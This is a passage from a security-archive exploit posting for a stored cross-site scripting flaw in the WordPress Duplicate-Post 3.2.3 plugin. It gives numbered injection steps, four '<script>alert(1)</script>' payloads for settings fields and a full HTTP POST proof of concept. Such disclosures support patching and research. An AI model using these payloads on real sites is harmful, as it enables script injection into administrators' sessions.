Duplicate-Post 3.2.3 Cross Site Scripting

Duplicate-Post 3.2.3 Cross Site Scripting: Posted Sep 26, 2019; Authored by Unk9vvN; Duplicate-Post version 3.2.3 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 6218deaa69f4d0f977768be33aca4c4e488b3b0e78c82fe7084e6b65d961d8d3; Download | Favorite | View

Duplicate-Post 3.2.3 Cross Site Scripting

# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-06-11
# Exploit Author: Unk9vvN
# Vendor Homepage: https://duplicate-post.lopo.it/
# Software Link: https://wordpress.org/plugins/duplicate-post/
# Version: 3.2.3
# Tested on: Kali Linux
# CVE: N/A

# Description
# This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows.

1.Go to the 'Settings' section
2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections
3.Click the "Save Changes" option
4.Your payload will run

# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
# Parameter & Payoad: 

duplicate_post_title_prefix="><script>alert(1)</script>
duplicate_post_title_suffix="><script>alert(1)</script>
duplicate_post_increase_menu_order_by="><script>alert(1)</script>
duplicate_post_blacklist="><script>alert(1)</script>


#
# PoC
#
POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
Content-Type: application/x-www-form-urlencoded
Content-Length: 981
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1


# Discovered by:
https://t.me/Unk9vvN

Top Authors In Last 30 Days

Red Hat 206 files
Ubuntu 106 files
indoushka 26 files
Debian 22 files
Gentoo 14 files
CraCkEr 13 files
Google Security Research 12 files
Mirabbas Agalarov 9 files
Apple 8 files
Ivan Fratric 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,757)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,858)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,368)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,647)
UNIX (9,245)
UnixWare (186)
Windows (6,557)
Other

Duplicate-Post 3.2.3 Cross Site Scripting

Duplicate-Post 3.2.3 Cross Site Scripting

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Duplicate-Post 3.2.3 Cross Site Scripting

Share This

Duplicate-Post 3.2.3 Cross Site Scripting

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems